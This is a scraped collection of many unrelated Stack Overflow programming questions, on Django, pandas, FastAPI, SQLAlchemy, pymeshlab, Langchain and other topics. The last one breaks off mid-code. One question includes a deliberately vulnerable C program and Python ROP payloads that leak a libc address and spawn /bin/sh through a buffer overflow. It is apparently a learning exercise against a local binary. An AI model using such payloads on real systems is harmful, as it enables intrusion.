<p>I'm having an issue where Django Rest Framework's custom permission system is treating my custom permissions' methods like they are <code>classmethods</code> or <code>staticmethods</code>.</p> <p>When hitting a breakpoint in the permission method:</p> <pre><code>def has_permission(self, request, view=None): </code></pre> <ul> <li><code>self</code> is an instance of request instead of an instance of the permission class</li> <li><code>request</code> is an instance of view</li> <li>and I had to put view=None because it was crashing with missing parameter errors</li> </ul> <p>Have I configured it wrong somehow?</p> <p>My <code>IsEmailVerified</code> permission used as a default permission has been working as expected for a month, but when adding custom permissions more programmatically I get errors.</p> <pre><code> File &quot;/app/api/permissions.py&quot;, line 50, in has_permission user = request.user ^^^^^^^^^^^^ AttributeError: 'ExampleViewSet' object has no attribute 'user' </code></pre> <p>settings.py:</p> <pre><code>REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'api.authentication.TokenAuthentication', ), 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', 'api.permissions.IsEmailVerifiedPermission', ), . . . } </code></pre> <p>permissions.py</p> <pre><code>class IsEmailVerifiedPermission(BasePermission): def has_permission(self, request, view=None): return request.user.email_verified def has_object_permission(self, request, view=None, obj=None): return request.user.email_verified class UserCreated(BasePermission): def has_permission(self, request, view=None): # While debugging the parameters don't line up: # self is an instance of request # request is an instance of view # and I had to put view=None because it was crashing with missing parameter errors def has_object_permission(self, request, view=None, obj=None): # See above issue class CanGloballyEdit(BasePermission): def has_permission(self, request, view=None): # See above issue def has_object_permission(self, request, view=None, obj=None): # See above issue </code></pre> <p>views/example.py</p> <pre><code>class ExampleViewSet(viewsets.GenericViewSet): serializer_class = ExampleSerializer def get_permissions(self): default_permissions = super(viewsets.GenericViewSet, self).get_permissions() if self.action == 'list': return [CanGloballyEdit] + default_permissions if self.action == 'retrieve': return [UserCreated] + default_permissions if self.action in ('update', 'partial_update'): return [UserCreated | CanGloballyEdit] + default_permissions return default_permissions </code></pre>
<python><django><django-rest-framework><permissions>
2024-01-13 23:29:26
1
379
NateOnGuitar
77,813,441
2,056,201
Cannot activate venv while debugging in Visual Studio Code
<p>I am able to activate the venv in terminal from VSCode in the console using <code>venv/Scripts/activate</code> command.</p> <p>I can run the python script in the terminal</p> <p>But when I try to Debug the same script in VSCode, it does not run in the Venv and I get missing dependency errors.</p> <p>What are the steps to enable the venv when debugging Python in VSCode</p> <p>The only instructions I can find are using &quot;Python: Select Interpreter&quot; settings</p> <p>Is this the same as activating the virtual environment? Do I just point it to <code>venv/Scripts/Python.exe</code> and it will work without activating anything?</p>
<python><windows><visual-studio-code>
2024-01-13 23:16:55
2
3,706
Mich
77,813,013
15,452,898
Create subsets in Python based on special conditions
<p>I am currently doing some data manipulation procedures and have run into a problem of how to make subsets based on special conditions.</p> <p>My example (dataframe) is like this:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2023-01-01 10 0 A ID1 2023-01-03 15 0 A ID1 2022-12-29 20 35 A ID1 2022-12-28 40 91 B ID2 2023-01-05 15 0 B ID2 2023-01-10 30 100 B ID2 2023-01-07 35 40 B ID2 2023-01-06 35 0 C ID3 2023-01-09 20 0 C ID3 2023-01-07 30 0 C ID3 2023-01-11 35 0 </code></pre> <p>My goal is to create two different subsets (two new dataframes):</p> <ol> <li>Create a table that includes the loans only issued last</li> </ol> <p>Expected result:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2023-01-03 15 0 B ID2 2023-01-10 30 100 C ID3 2023-01-11 35 0 </code></pre> <ol start="2"> <li>Group the data in such a way that for each borrower only the loan issued first with DurationOfDelay &gt; 0 is returned</li> </ol> <p>Expected result:</p> <pre><code>Name ID ContractDate LoanSum DurationOfDelay A ID1 2022-12-28 40 91 B ID2 2023-01-07 35 40 </code></pre> <p>Would you be so kind to help me achieve these results? Any kind of help is highly appreciated!</p>
<python><dataframe><pyspark><filtering><data-manipulation>
2024-01-13 20:37:27
1
333
lenpyspanacb
77,812,660
893,254
Why does the presence of the Global Interpreter Lock not prevent data corruption issues when using thread shared state?
<p>I am trying to understand exactly what the Global Interpreter Lock (GIL) in Python protects, and what it does not protect.</p> <p>An example code which demonstrates an answer to this question would be useful. I can't create such a thing myself, because I do not fully understand what state the GIL protects and what it does not protect.</p> <p>Python has threads and those threads can share state. In languages like C, any many others, in order to access the shared state we might use something like a mutex, a semaphore, a condition variable or some other construct which provides synchronization or atomicity. Typically such things would be implemented by communication with the Operating System via system calls, which provides a single point of synchronization and control. (The OS thread.)</p> <p>If I understand correctly, the Python GIL prevents more than one thread executing Python code - which is interpreted by the Python Interpreter.</p> <p>Further, if I understand correctly, if we spawn 8 Python threads, then we still only have 1 Python Interpreter.</p> <p>Those threads then become useful under two conditions:</p> <ul> <li>a thread has to go away and do some IO operation, which releases the GIL allowing another thread to execute Python code</li> <li>a thread calls into some code which is implemented in a language like C. In some cases this code will explicitly release and then later re-acquire the GIL. Numpy is an example of such a library.</li> </ul> <p>I can't quite imagine why the GIL is not sufficient to protect the shared state between 2 or more Python threads.</p> <p>Can someone explain this to me? A code example demonstrating why synchronization primatives such as a mutex are required would be very helpful.</p>
<python><multithreading><gil>
2024-01-13 18:37:18
1
18,579
user2138149
77,812,632
11,357,623
factory pattern with lambda
<p>How would you create a factory based method using lambda?</p> <p>function signature looks like this. Factory gets a string parameter and returns the instance.</p> <pre><code>class Foo: @abstractmethod def store(factory: Callable[[str], Bar]) obj = factory(&quot;abc&quot;) # store or call to get instance class Bar: def __init__(self): pass </code></pre> <p>How to call this method using lambda?</p> <pre><code>Foo.store(lambda k: Bar(k)) </code></pre> <p>Error</p> <blockquote> <p>Parameter 'factory' unfilled</p> </blockquote>
<python><factory>
2024-01-13 18:28:00
1
2,180
AppDeveloper
77,812,285
13,968,392
column order relevant in df.to_sql(if_exists="append")?
<p>I was wondering, whether <code>df.to_sql(&quot;db_table&quot;, con=some_engine, if_exists=&quot;append&quot;)</code> requires that the order of the columns of <code>df</code> (a dataframe) and <code>db_table</code> (a database table) has to be the same. There is nothing about it in the <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_sql.html#pandas.DataFrame.to_sql" rel="nofollow noreferrer">documentation</a>, so I tried it out. The result is that the order doesn't have to be the same. However, where can I find out whether the order has to match, without trying an example code? How can I find the location where it is revealed what if_exists=&quot;append&quot; does (for example, in PyCharm)?</p>
<python><sql><pandas><pandas-to-sql>
2024-01-13 16:53:39
1
2,117
mouwsy
77,812,185
3,123,290
Accessing Eager-Loaded Relationships When Lazy Loading in Async Sqlalchemy
<p>Asyncio Sqlalchemy has the nifty <code>awaitable_attrs</code> that allows you to lazy load relationships you might otherwise be forced to eager load. However, when you <em>do</em> lazy load relationship objects, those objects do not appear to execute their respective relationship loading strategies. For example:</p> <pre class="lang-py prettyprint-override"><code> class Parent(Base): __tablename__ = &quot;parent&quot; children:Mapped[&quot;Child&quot;] = relationship(&quot;Child&quot;, back_populates=&quot;parent&quot;) class Child(Base): __tablename__ = &quot;child&quot; parent_id:Mapped[int] = mapped_column(ForeignKey(&quot;parent.id&quot;)) parent: Mapped[&quot;Parent&quot;] = relationship(&quot;Parent&quot;) toys:Mapped[List[&quot;Toy&quot;]] = relationship(&quot;Toy&quot;, lazy=&quot;selectin&quot;) </code></pre> <p>You would expect this:</p> <pre class="lang-py prettyprint-override"><code> async with db_session: children = await parent.awaitable_attrs.children print(children[0].toys) # prints [Toy('thing'), Toy('other thing')] </code></pre> <p>but what you'll actually get is this</p> <pre class="lang-bash prettyprint-override"><code>Error extracting attribute: DetachedInstanceError: Parent instance 'Child' is not bound to a Session; lazy load operation of attribute 'toys' cannot proceed </code></pre>
<python><sqlalchemy><python-asyncio>
2024-01-13 16:25:55
1
778
EthanK
77,812,156
2,779,432
Reassign dictionary key values
<p>I have this dictionary</p> <pre><code>brands = { 1: 'BPR Performance Rimfire', 2: 'M22', 3: 'M22 Subsonic', 4: 'Super Suppressed', 5: 'Super X', 6: 'USA', 7: 'Varmint HE', 8: 'Varmint LF', 9: 'Wildcat', 10: 'Xpert', } </code></pre> <p>and depending on some user selection I want to display a subset of this dictionary in the form of a menu, which I can do but I would like to update the keys so that if I'm only showing three elements such as</p> <pre><code>1 -- BPR Performance Rimfire 5 -- Super X 7 -- Varmint HE </code></pre> <p>I could reassign the number corresponding to the option, for example</p> <pre><code>1 -- BPR Performance Rimfire 2 -- Super X 3 -- Varmint HE </code></pre> <p>To do so, I have made these two functions</p> <pre><code>def entries_to_remove(entries, dictionary): for key in entries: if key in dictionary: del dictionary[key] def update_keys(dictionary): dict_copy = dictionary.copy() key_n = 1 for k in dictionary: dict_copy[key_n] = dict_copy.pop(k) key_n = key_n + 1 return dict_copy </code></pre> <p>then I define the entries to remove, which works</p> <pre><code>entries = (2, 3, 4, 6, 9, 10) entries_to_remove(entries, brands) </code></pre> <p>and then call</p> <pre><code>brands = update_keys(brands) </code></pre> <p>which gives me an error in the function entries_to_remove</p> <pre><code> File &quot;C:\Users\teide\Documents\Guns\moa_clicks.py&quot;, line 70, in addBullet entries_to_remove(entries, brands) ^^^^^^ UnboundLocalError: cannot access local variable 'brands' where it is not associated with a value </code></pre> <p>If I comment out <code>brands = update_keys(brands)</code> the code executes normally and gives me the expected result</p> <pre><code>Choose brand 1 -- BPR Performance Rimfire 5 -- Super X 7 -- Varmint HE 8 -- Varmint LF </code></pre> <p>I don't understand what I'm doing wrong and some help would be greatly appreciated.</p> <p>I'm adding the full code that I have at the moment</p> <pre><code>menu_options = { 1: 'Add bullet type', 2: 'Calculate MOA clicks', 3: 'Exit', } cartridge_types = { 1: '17 HMR', 2: '17 Win Super Mag', 3: '22 Long', 4: '22 Long Rifle', 5: '22 Short', 6: '22 Win Mag', 7: '22 WRF', } brands = { 1: 'BPR Performance Rimfire', 2: 'M22', 3: 'M22 Subsonic', 4: 'Super Suppressed', 5: 'Super X', 6: 'USA', 7: 'Varmint HE', 8: 'Varmint LF', 9: 'Wildcat', 10: 'Xpert', } def print_menu(menu): for key in menu.keys(): print (key, '--', menu[key] ) def entries_to_remove(entries, dictionary): for key in entries: if key in dictionary: del dictionary[key] def update_keys(dictionary): dict_copy = dictionary.copy() key_n = 1 for k in dictionary: dict_copy[key_n] = dict_copy.pop(k) key_n = key_n + 1 return dict_copy def addBullet(): name = str(input('Enter bullet name: ')) print('Choose cartridge type') print_menu(cartridge_types) cType = cartridge_types.get(int(input())) if cType == cartridge_types.get(1): entries = (2, 3, 4, 6, 9, 10) entries_to_remove(entries, brands) #brands = update_keys(brands) print('Choose brand') print_menu(brands) brand = brands.get(int(input())) while(True): print_menu(menu_options) option = int(input('Enter your choice: ')) if option == 1: addBullet() elif option == 2: calculateMOA() elif option == 3: print('Goodbye') exit() else: print('Invalid option. Please enter a number between 1 and 3.') </code></pre>
<python><dictionary>
2024-01-13 16:16:32
1
501
Francesco
77,811,984
2,437,508
python - can't come back when reaching EOF when using less as a pager
<p>I am using <code>less</code> as a pager so that output of the application can be read easily. I create the subprocess like this:</p> <pre><code>a_process = subprocess.Popen([&quot;less&quot;], stdin=subprocess.PIPE) </code></pre> <p>Then I write into the pager like this (multiple lines):</p> <pre><code>a_process.stdin.write(&quot;hello\n&quot;.encode()) a_process.stdin.flush() </code></pre> <p>Before I finish execution I call <code>a_process.wait()</code> and the user is able to move up and down as expected.... if the user hits <code>q</code> the pager ends and the python application ends as there is no more stuff in the python script.... <em>however</em>, if the user reaches the end of the output I provided to <code>less</code>, the UI freezes.... the user can't go up, can't quit using <code>q</code>... only <code>ctrl-c</code> will work to finish execution.</p> <p>What piece am I missing to avoid reaching this state?</p>
<python><subprocess><less>
2024-01-13 15:28:41
1
31,374
eftshift0
77,811,879
5,177,326
How to match regex in contents from file in python?
<p>This forum is full of similar questions, so here is mine:</p> <pre><code>import re import subprocess rx = re.compile(&quot;(?m)^\(cpu\)\(.*\)&quot;) output = subprocess.run([&quot;cat&quot;,&quot;/proc/cpuinfo&quot;], stdout=subprocess.PIPE) lines = output.stdout.decode('utf-8') r = rx.search(lines) if r: print(r.groups()) </code></pre> <p>I expect this snipped to find some <code>cpu</code> in the multi-line file, but nothing is shown. (The actual code that fails for me looks of course different, but this is the simplest test case that fails for me, and I can not figure out why...)</p>
<python><regex>
2024-01-13 14:58:05
2
328
olh
77,811,835
7,478,525
How to configure two microservices using Python (uvicorn/fastapi/requests) to call each other in one use case?
<p>I have two microservices. Let's name them <code>service1</code> and <code>service2</code>. I have implemened an endpoint on <code>service1</code> which calls an endpoint from <code>service2</code>. To fullfill this request, an endpoint from <code>service2</code> needs some data from <code>service1</code>, so <strong>it calls another endpoint</strong> from <code>service1</code>. And usually this works fine and both services are getting 200 REST responses, so there is no issue.</p> <p>BUT sometimes one of the microservices receives wrong data or there is some network issue and then <strong>both microservices freeze and the pods on kubernetes restarts. From the user's perspective it throws a 502 (bad gateway) error in the web browser.</strong> In the logs I can see that requests POST is made, but then nothing more is logged and I can only see uvicorn's startup logs, something like this:</p> <pre><code>INFO: Started server process [1490] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://0.0.0.0:8080 (Press CTRL+C to quit) </code></pre> <p>To be more precise, both microservices use FastAPI as a main framework and they are running on Python's uvicorn and the requests are posted with standard &quot;requests&quot; package like this:</p> <pre><code>import requests url = 'https://www.example.com/some-endpoint' myobj = {'somekey': 'somevalue'} x = requests.post(url, json = myobj) </code></pre> <p>So my question is - <strong>how to configure both microservices to avoid such situations?</strong> Is there any flag in uvicorn or requests that I can specify to prevent apps from crashing like this? Or maybe is there a differnt method of comunications for such use case like queues in RabbitMQ or something similar? I'm open to suggestions.</p>
<python><rest><microservices><fastapi><uvicorn>
2024-01-13 14:46:50
1
783
westman379
77,811,591
1,186,421
Django 5 signal asend: unhashable type list
<p>Trying to make a short example with django 5 async signal. Here is the code:</p> <p>View:</p> <pre class="lang-py prettyprint-override"><code>async def confirm_email_async(request, code): await user_registered_async.asend( sender=User, ) return JsonResponse({&quot;status&quot;: &quot;ok&quot;}) </code></pre> <p>Signal:</p> <pre class="lang-py prettyprint-override"><code>user_registered_async = Signal() @receiver(user_registered_async) async def async_send_welcome_email(sender, **kwargs): print(&quot;Sending welcome email...&quot;) await asyncio.sleep(5) print(&quot;Email sent&quot;) </code></pre> <p>The error trace is:</p> <pre><code>Traceback (most recent call last): File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\asgiref\sync.py&quot;, line 534, in thread_handler raise exc_info[1] File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\core\handlers\exception.py&quot;, line 42, in inner response = await get_response(request) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\asgiref\sync.py&quot;, line 534, in thread_handler raise exc_info[1] File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\core\handlers\base.py&quot;, line 253, in _get_response_async response = await wrapped_callback( ^^^^^^^^^^^^^^^^^^^^^^^ File &quot;C:\Users\karonator\Desktop\signals\main\views.py&quot;, line 34, in confirm_email_async await user_registered_async.asend( File &quot;C:\Users\karonator\AppData\Roaming\Python\Python311\site-packages\django\dispatch\dispatcher.py&quot;, line 250, in asend responses, async_responses = await asyncio.gather( ^^^^^^^^^^^^^^^ File &quot;C:\Program Files\Python311\Lib\asyncio\tasks.py&quot;, line 819, in gather if arg not in arg_to_fut: ^^^^^^^^^^^^^^^^^^^^^ TypeError: unhashable type: 'list' </code></pre> <p>Will be grateful for any help, already broken my head. Thanks for your time.</p>
<python><django><python-asyncio><django-signals>
2024-01-13 13:31:18
1
2,673
KaronatoR
77,811,394
15,671,866
Buffer overflow script using subprocess
<p>This is my <code>vuln.c</code> code:</p> <pre class="lang-c prettyprint-override"><code>#include &lt;stdio.h&gt; #include &lt;unistd.h&gt; // this function is added because I need that sequence of assembly istructions in the binary file void oh_look_useful() { asm(&quot;pop %rdi; ret&quot;); } int vuln() { char buf[80]; int r; r = read(0, buf, 400); puts(&quot;No shell for you :(&quot;); return 0; } int main(int argc, char *argv[]) { printf(&quot;Try to exec /bin/sh\n&quot;); vuln(); return 0; } </code></pre> <p>This code has to be compiled with the flag <code>-no-pie</code> to make the buffer overflow exploitable, for example:</p> <pre><code>gcc vuln.c -no-pie -o vuln </code></pre> <p>So running the C program, it does a print, then wait for user input and then another print occurs. My python exploit has to send a payload which has to leak the libc base address, restart the program and then make a call to <code>system('/bin/sh')</code>. A good explaination on how it's possible can be found <a href="https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/" rel="nofollow noreferrer">here</a>, but for this particolar code the payload that make the leak and restart the program is built as follow:</p> <pre class="lang-py prettyprint-override"><code>def p64(x): return struct.pack(&quot;&lt;Q&quot;, x) # used variables can be found in many ways, such as the previously linked guide payload = ( b&quot;A&quot; * 104 + p64(pop_rdi_addr) + p64(read_got_addr) + p64(puts_plt_addr) + p64(main_addr) ) </code></pre> <p>Now it's time to send the payload, that's what I tried:</p> <pre class="lang-py prettyprint-override"><code>process = subprocess.Popen( FILENAME, stdin=subprocess.PIPE, stdout=subprocess.) with process.stdin as pipe: pipe.write(payload) process.stdout.readline() process.stdout.readline() leaked_data = process.stdout.readline() leaked_addr = u64(leaked_data.ljust(8, b&quot;\x00&quot;)) print(f&quot;Leaked addr: {hex(leaked_addr)}\n&quot;) </code></pre> <p>The correct address is printed. Now the C program is restarted, and it's waiting for another payload. This is the one which is going to call <code>system('/bin/sh')</code>. In my case, the working one is:</p> <pre class="lang-py prettyprint-override"><code>payload = b'A' * RIP_OFFSET + p64(pop_rdi_addr) + p64(bin_sh_addr) # If sigseg occurs when sending payload, try to remove following line payload += p64(pop_rdi_addr + 1) # but keep this line payload += p64(system_addr) </code></pre> <p>As before, addresses may be found in several ways. Now it's time to send payload and get shell:</p> <pre class="lang-py prettyprint-override"><code>with process.stdin as pipe: pipe.write(payload) </code></pre> <p>but for sure it's not going to work because the <code>stdin</code> has been already closed. Then I tried:</p> <ul> <li>to put everything into the same <code>with process.stdin as pipe:</code>, but the script is blocked on the very first <code>process.readline()</code>.</li> <li>to add a trailing <code>b'\x0a'</code> to payload, that is the binary code for '\n', but nothing changed.</li> <li>to remove any <code>with</code> and use:</li> </ul> <pre class="lang-py prettyprint-override"><code>process.stdin.write(payload) process.stdin.flush() process.stdout.readline() process.stdout.readline() </code></pre> <p>but nothing changes again.</p> <p>I also tried:</p> <pre class="lang-py prettyprint-override"><code>payload = ( b&quot;A&quot; * 104 + p64(pop_rdi_addr) + p64(read_got_addr) + p64(puts_plt_addr) + p64(main_addr) ) master_fd, slave_fd = pty.openpty() ts = termios.tcgetattr(master_fd) ts[3] &amp;= ~(termios.ICANON | termios.ECHO) termios.tcsetattr(master_fd, termios.TCSANOW, ts) process = subprocess.Popen( FILENAME, stdin=slave_fd, stdout=slave_fd, preexec_fn=lambda: os.close(master_fd)) try: os.close(slave_fd) master = os.fdopen(master_fd, 'rb+', buffering=0) print('first read') print(repr(master.readline())); master.write(payload); master.flush() print(repr(master.readline())); leaked_data = master.readline(); except Exception as e: print(&quot;Exception occurs:&quot;) print(str(e)) exit(-1) leaked_addr = u64(leaked_data.ljust(8, b'\x00')) </code></pre> <p>based on <a href="https://stackoverflow.com/questions/77802033/c-program-and-subprocess/77807014?noredirect=1#comment137172674_77807014">this more general question</a>, but I got exception:</p> <pre><code>python script.py Starting leaking... first read b'Try to exec /bin/sh\r\n' b'No shell for you :(\r\n' Exception occurs: [Errno 5] Input/output error </code></pre> <p>The error occurs when the script tries to read the leaked address. In the last scenario, I'm not able to realize if the C program crashes before leak address or if the problem is in the python script. I'm sure that payloads are correct, because I've already written the same script using the <code>pwntools</code> library and it works, but since the script has to run into the target machine and <code>pwntools</code> is not built-in, then I want to prepare a more general one which only use built-in libraries.</p> <p>Another thing to keep in mind is that, in the end of the script, I have to continuously interact with the spawned bash, then the stdin/stdout of the process has to be conencted to the python script.</p> <p>Then my question: how can I get the subprocess correctly communicate with the C program?</p>
<python><c><subprocess><buffer-overflow>
2024-01-13 12:21:55
0
585
ma4stro
77,810,920
1,473,517
How to find pair of subarrays with maximal sum
<p>Given an array of integers, I can find the maximal subarray sum using <a href="https://en.wikipedia.org/wiki/Maximum_subarray_problem" rel="nofollow noreferrer">Kadane's algorithm</a>. In code this looks like:</p> <pre><code>def kadane(arr, n): # initialize subarray_sum, max_subarray_sum and subarray_sum = 0 max_subarray_sum = np.int32(-2**31) # Just some initial value to check # for all negative values case finish = -1 # local variable local_start = 0 for i in range(n): subarray_sum += arr[i] if subarray_sum &lt; 0: subarray_sum = 0 local_start = i + 1 elif subarray_sum &gt; max_subarray_sum: max_subarray_sum = subarray_sum start = local_start finish = i # There is at-least one # non-negative number if finish != -1: return max_subarray_sum, start, finish # Special Case: When all numbers in arr[] are negative max_subarray_sum = arr[0] start = finish = 0 # Find the maximum element in array for i in range(1, n): if arr[i] &gt; max_subarray_sum: max_subarray_sum = arr[i] start = finish = i return max_subarray_sum, start, finish </code></pre> <p>This is fast and works well. However, I would like to find a pair of subarrays with maximal sum. Take this example input.</p> <pre><code>arr = [3, 3, 3, -8, 3, 3, 3] </code></pre> <p>The maximal subarray is the entire array with sum 10. But if I am allowed to take two subarrays they can be [3, 3, 3] and [3, 3, 3] which has sum 18.</p> <p>Is there a fast algorithm to compute the maximal pair of subarrays? I am assuming the two subarrays will not overlap.</p>
<python><algorithm><performance>
2024-01-13 09:25:51
2
21,513
Simd
77,810,703
3,337,089
Loading video using scikit-video latest version and numpy latest version gives numpy has no float attribute error
<p>I have installed the latest version of <code>scikit-video=1.1.11</code> and the latest version of <code>numpy=1.26.1</code>. When trying to load a video as</p> <pre><code>&gt;&gt;&gt; import skvideo.io &gt;&gt;&gt; skvideo.io.vread('video_path.mp4') </code></pre> <p>I get the following error</p> <pre><code>Traceback (most recent call last): File &quot;&lt;stdin&gt;&quot;, line 1, in &lt;module&gt; File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/io.py&quot;, line 144, in vread reader = FFmpegReader(fname, inputdict=inputdict, outputdict=outputdict, verbosity=verbosity) File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/ffmpeg.py&quot;, line 44, in __init__ super(FFmpegReader,self).__init__(*args, **kwargs) File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/skvideo/io/abstract.py&quot;, line 87, in __init__ if np.float(parts[1]) == 0.: File &quot;/home/user/anaconda3/envs/snb/lib/python3.10/site-packages/numpy/__init__.py&quot;, line 324, in __getattr__ raise AttributeError(__former_attrs__[attr]) AttributeError: module 'numpy' has no attribute 'float'. `np.float` was a deprecated alias for the builtin `float`. To avoid this error in existing code, use `float` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.float64` here. The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'cfloat'? </code></pre> <p>The error goes away if I install older version of <code>numpy=1.23.5</code> as suggested <a href="https://stackoverflow.com/a/74864409/3337089">in this answer</a>. The answer notes that <code>float</code> attribute is deprecated in <code>numpy=1.20</code> and removed in <code>numpy=1.24</code>.</p> <p>So, why has <code>scikit-video</code> not updated this in their latest version? Is there no way to use latest <code>numpy</code> with <code>scikit-video</code>?</p>
<python><numpy><video><scikits>
2024-01-13 07:56:47
1
7,307
Nagabhushan S N
77,810,665
10,896,941
Is it possible to make non-first tab selected in PySimpleGUI window startup?
<pre><code>window = sg.Window(&quot;foobar&quot;, layout, margins=(2, 2), finalize=True) window.Element('-ENCR_TAB-').Select() </code></pre> <p>What I see is that the first tab is selected and only after a little while the '-ENCR_TAB-' (the second tab) is selected as expected. Is it possible to have it selected by default without such a delay?</p>
<python><user-interface><pysimplegui>
2024-01-13 07:42:44
2
410
Jiri B
77,810,565
6,202,327
Pymeshlab claiming files are not present when they are?
<p>I have two pymeshlab scripts:</p> <pre class="lang-py prettyprint-override"><code>import os import argparse import pymeshlab from collections import Counter def load_mesh(file_path): ms = pymeshlab.MeshSet() ms.load_new_mesh(file_path) measures = ms.get_topological_measures() print(measures) def main(): # Parse command-line arguments parser = argparse.ArgumentParser(description=&quot;Count the number of 'ok' meshes in a directory.&quot;) parser.add_argument(&quot;-i&quot;, &quot;--input&quot;, required=True, help=&quot;Path to the directory containing OBJ files.&quot;) args = parser.parse_args() results = load_mesh(args.input) if __name__ == &quot;__main__&quot;: main() </code></pre> <p>And</p> <pre class="lang-py prettyprint-override"><code>import os import argparse import pymeshlab from collections import Counter def is_mesh_ok(file_path): try: ms = pymeshlab.MeshSet() ms.load_new_mesh(file_path) measures = ms.get_topological_measures() except Exception as e: print(f&quot;Failed to load mesh '{file_path}': {e}&quot;) return &quot;Load Failed&quot; genus = measures['genus'] connected_components = measures['connected_components_number'] is_two_manifold = measures['is_mesh_two_manifold'] hole_count = measures['number_holes'] is_ok = (genus == 0) and (connected_components == 1) and (is_two_manifold is True) and (hole_count == 0) if is_ok: return &quot;OK&quot; else: failed_criteria = [] if genus != 0: failed_criteria.append(&quot;Genus&quot;) if connected_components != 1: failed_criteria.append(&quot;Connected Components&quot;) if not is_two_manifold: failed_criteria.append(&quot;Is Two Manifold&quot;) if hole_count != 0: failed_criteria.append(&quot;Number of Holes&quot;) return &quot;, &quot;.join(failed_criteria) def count_ok_meshes(directory_path): results = [] for filename in os.listdir(directory_path): if filename.endswith('.obj'): file_path = os.path.join(directory_path, filename) result = is_mesh_ok(file_path) results.append(result) return results def main(): # Parse command-line arguments parser = argparse.ArgumentParser(description=&quot;Count the number of 'ok' meshes in a directory.&quot;) parser.add_argument(&quot;-d&quot;, &quot;--directory&quot;, required=True, help=&quot;Path to the directory containing OBJ files.&quot;) args = parser.parse_args() results = count_ok_meshes(args.directory) counter = Counter(results) print(&quot;Histogram of Failed Criteria:&quot;) for key, value in counter.items(): print(f&quot;{key}: {value}&quot;) if __name__ == &quot;__main__&quot;: main() </code></pre> <p>I am calling both on the same files, they are on the same directory. The short script seems to work, but the large one claims it cannot find some of the files, I don;t understand how. For example the large one shows this error:</p> <pre><code>Failed to load mesh 'clean_results/mesh703.obj': File does not exists: clean_results/mesh703.obj </code></pre> <p>For the exact same file the small one returns:</p> <pre class="lang-py prettyprint-override"><code>{'boundary_edges': 0, 'connected_components_number': 1, 'edges_number': 4629, 'faces_number': 3086, 'genus': 0, 'incident_faces_on_non_two_manifold_edges': 0, 'incident_faces_on_non_two_manifold_vertices': 0, 'is_mesh_two_manifold': True, 'non_two_manifold_edges': 0, 'non_two_manifold_vertices': 0, 'number_holes': 0, 'unreferenced_vertices': 0, 'vertices_number': 1545} </code></pre> <p>It also only happens with some files, not all, and seems to change between invocations. I don't understand how this is happening. Why is the large script failing to find files using the exact same logic the small one is using?</p>
<python><geometry><mesh><pymeshlab>
2024-01-13 06:53:25
0
9,951
Makogan
77,810,548
3,547,851
Langchain model to extract key information from pdf
<p>I was looking for a solution to extract <strong>key information</strong> from pdf based on my instruction.</p> <p>Here's what I've done:</p> <ol> <li>Extract the pdf text using ocr</li> <li>Use langchain splitter , CharacterTextSplitter, to split the text into chunks</li> <li>Use Langchain, FAISS, OpenAIEmbedding to extract information based on the instruction</li> </ol> <p>The problems that i faced are:</p> <ol> <li>Sometimes the several first items in the doc is being skipped</li> <li>It only returns few items, instead of the whole items, let's say the item is 1000, because of the limitation of chatgpt of returning response, i splitted it into 20 products first, and how can i continue to grab the rest of the products? so i can combine them later.</li> </ol> <p>I am using gpt-3.5-turbo for now.</p> <p>The goals are:</p> <ol> <li>It can return all goods based on what's inside the pdf doc, and the goods could be thousands. (remember there's gpt token limitation for returning response)</li> </ol> <p>My question is:</p> <ol> <li>What is the best langchain model or best methods to achieve my goals</li> </ol> <p>(I'm quite new in this langchain world)</p> <p>This is the code</p> <pre><code>from langchain.text_splitter import CharacterTextSplitter from langchain_community.vectorstores import faiss from langchain.chains.question_answering import load_qa_chain from langchain.chains import ( StuffDocumentsChain, LLMChain, ConversationalRetrievalChain) from langchain_core.prompts import PromptTemplate from langchain_openai import ChatOpenAI, OpenAIEmbeddings import os import sentry_sdk from flask_cors import CORS, cross_origin from instructions import (GOODS_INSTRUCTION_V2, GOODS_INSTRUCTION_WITH_LIMIT_20_V2) from flask import Flask, request, jsonify, abort import json import concurrent.futures from pdf2image import convert_from_path import pytesseract import requests from datetime import datetime from urllib.parse import unquote from pathlib import Path import os from typing_extensions import Concatenate from utils import Utils app = Flask(__name__) CORS(app) utils = Utils() llm = ChatOpenAI(temperature=0, model_name=&quot;gpt-3.5-turbo&quot;, openai_api_key=&quot;abc123&quot;, max_tokens=2000) @app.route('/upload', methods=['POST']) def upload_file(): start_time = datetime.now() if 'file' not in request.files: return &quot;No file part&quot; file = request.files['file'] if file.filename == '': return &quot;No selected file&quot; # Save the uploaded file and get its filename filename = utils.save_uploaded_file(file) embeddings = OpenAIEmbeddings() # Construct expected text file path expected_text_file = os.path.splitext(filename)[0] + &quot;.txt&quot; expected_text_file = expected_text_file.replace(&quot;uploads/&quot;, &quot;output/&quot;) print(&quot;Expected text file:&quot;, expected_text_file) file_size = 0 if os.path.exists(expected_text_file): with open(expected_text_file, 'r', encoding='utf-8') as file: extracted_text = file.read() print(&quot;Text loaded from existing file&quot;) else: # Check file size file_size = os.path.getsize(filename) # Extract text from the PDF or use OCR if needed extracted_text = utils.extract_text_from_pdf_using_ocr(filename) text_splitter = CharacterTextSplitter( separator=&quot;\n&quot;, chunk_size=800, chunk_overlap=200, length_function=len, ) chunks = text_splitter.split_text(extracted_text) print(&quot;Chunks Length:&quot;, len(chunks)) document_search = 